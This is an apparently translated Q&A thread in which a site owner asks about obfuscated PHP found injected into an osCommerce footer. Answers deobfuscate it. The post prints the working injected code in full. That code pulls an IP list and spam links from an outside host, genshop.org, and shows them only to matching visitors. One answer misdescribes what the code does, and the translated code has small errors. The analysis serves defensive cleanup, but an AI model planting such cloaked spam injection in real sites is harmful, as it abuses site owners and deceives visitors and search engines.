如何解决此代码是否被利用?这是什么代码?
| 我正在寻找一个被某人/某物利用的网站。该网站的页脚中已经插入了许多链接,这些链接都链接到药物宣传,还有谁知道呢。页脚顶部有很多链接。我现在只能在Yahoo索引中的缓存页面上找到它们。 Google对该网站仍然不满意,并且该实时网站不再显示任何链接。这是给客户的..所以我大多数时候都知道我被告知的内容,以及其他可以发现的内容。 我在footer.php的\“ tip / top \”(这是一个OsCommerse网站)的\“ tip / top \”中找到了以下代码:<?php $x13=\"cou\\156\\x74\"; $x14=\"\\x65\\x72\\162\\x6fr\\x5f\\x72ep\\157\\162\\164ing\"; $x15=\"\\146\\151l\\x65\"; $x16=\"\\146i\\154\\145_g\\x65t\\x5f\\x63\\x6fn\\164\\145n\\164s\"; $x17=\"\\163\\x74rle\\156\"; $x18=\"\\163tr\\160o\\x73\"; $x19=\"su\\x62\\x73\\164\\162\"; $x1a=\"tr\\151m\";
ini_set(\' display_errors\',\'off\');$x14(0);$x0b = \"\\150t\\x74p\\x3a\\057\\057\\x67\\145n\\x73h\\157\\x70\\056org/\\163\\x63\\162ipt\\057\\155a\\163k\\x2e\\x74x\\x74\";$x0c = $x0b; $x0d = $_SERVER[\"\\x52E\\115O\\124\\105_A\\104\\104\\122\"]; $x0e = @ $x15($x0c); for ( $x0f = 0; $x0f < $x13($x0e); $x0f++ ) {$x10 = $x1a($x0e[$x0f]);if ( $x10 != \"\" ){ if ( ($x11 = $x18($x10,\"*\")) !== false ) $x10 = $x19($x10,$x11); if ( $x17($x10) <= $x17($x0d) && $x18($x0d,$x10) === 0 ) { $x12 =$x16(\"\\150\\164\\164\\160\\x3a/\\057g\\145\\x6e\\x73\\x68o\\160\\056o\\162\\x67\\057\\160aral\\x69\\x6e\\x6b\\x73\\x2f\\156e\\167\\x2f3\\057\\x66\\145e\\144\\x72\\157lle\\x72\\x2e\\143\\x6f\\x6d\\x2e\\x74\\170\\x74\"); echo \"$x12\"; } }}echo \"\\x3c\\041\\055\\x2d \\060\\x36\\071\\x63\\x35b4\\x66e5\\060\\062\\067\\146\\x39\\x62\\0637\\x64\\x653\\x31d2be5\\145\\141\\143\\066\\x37\\040\\x2d-\\076\";?>
当我查看具有\'Bad \'链接的源缓存页面时,此代码正好适合在footer.php源代码中找到它的位置。 Google的一项小研究表明,有类似代码的漏洞利用。
您怎么看,当我在自己的服务器上运行它时,我得到的只是源代码中的回显注释,如下所示:
<!-- 069c5b4fe5027f9b37de31d2be5eac67 -->
我不想仅仅因为它看起来很糟糕而匆忙删除代码并说“你的好”,尤其是因为我没有立即知道“坏链接”已经消失的方法。顺便说一句,所有链接都转到无效的URL。
您会看到仍然在Yahoo中缓存的不良页面:
http://74.6.117.48/search/srpcache?ei=UTF-8&p=http%3A%2F%2Fwww.feedroller.com%2F+medicine&fr=yfp-t-701&u=http://cc.bingj.com/ cache.aspx?q = http%3a%2f%2fwww.feedroller.com%2f + medicine&d = 4746458759365253&mkt = zh-CN&setlang = zh-CN&w = b97b0175,d5f14ae5&icp = 1&.intl = us&sig = Ifqk1OuvHXNcZnAg--
解决方法
这是清晰的脚本(或多或少)
只是将该网址的内容转储到您的页面上
它还会根据IP列表(google等)检查remote_addr,以使其保持未被检测到的状态。
看起来您被genshop.com迷住了
<?php
$count=\"cou\\156\\x74\"; // count
$error_reporting=\"\\x65\\x72\\162\\x6fr\\x5f\\x72ep\\157\\162\\164ing\"; // error_reporting
$file=\"\\146\\151l\\x65\"; // file
$file_get_contents=\"\\146i\\154\\145_g\\x65t\\x5f\\x63\\x6fn\\164\\145n\\164s\"; // file_get_contents
$strlen=\"\\163\\x74rle\\156\"; // strlen
$strpos=\"\\163tr\\160o\\x73\"; // strpos
$substr=\"su\\x62\\x73\\164\\162\"; // substr
$trim=\"tr\\151m\"; //trim
ini_set(\' display_errors\',\'off\');
$error_reporting(0);
$x0b = \"http://genshop.org/scripts/mask.txt\";
$url = $x0b;
$tmp = \"REMOTE_ADDR\";
$x0d = $_SERVER[$tmp];
$tmp_filename = \"http://genshop.org/paralinks/new/3/feedroller.com.txt\";
$IPs = @ $file($url);
for ( $i = 0; $i < $count($IPs); $i++ ) {
$curr_ip = $trim($ips[$i]);
if ( $curr_ip != \"\" ) {
if ( ($x11 = $strpos($curr_ip,\"*\")) !== false )
$curr_ip = $substr($curr_ip,$x11);
// check visitor ip against mask list
if ( $strlen($curr_ip) <= $strlen($x0d) && $strpos($x0d,$curr_ip) === 0 ) {
$x12 = $file_get_content($tmp_filename);
echo \"$x12\";
// print spam contents
}
}
}
echo $curr_ip;
}
$tmp2 = \"\\x3c\\041\\055\\x2d \\060\\x36\\071\\x63\\x35b4\\x66e5\\060\\062\\067\\146\\x39\\x62\\0637\\x64\\x653\\x31d2be5\\145\\141\\143\\066\\x37\\040\\x2d-\\076\";
echo $tmp2;
?>
, 似乎引用/加载了两个URL:
http://genshop.org/script/mask.txt
http://genshop.org/paralinks/new/3/feedroller.com.txt
它只是垃圾邮件分发脚本。
对于部分混淆,请使用:
print preg_replace(\'#\"[^\"]+\\\\\\\\\\w+\"#e\',\"stripcslashes(\'$0\')\",$source);
, 这实际上是一种转储有关正在运行的配置的信息的尝试。立即将其删除。
它的工作方式非常复杂,超出了我的范围,但这是黑客入侵您的网站的第一步。
版权声明:本文内容由互联网用户自发贡献,该文观点与技术仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 dio@foxmail.com 举报,一经查实,本站将立刻删除。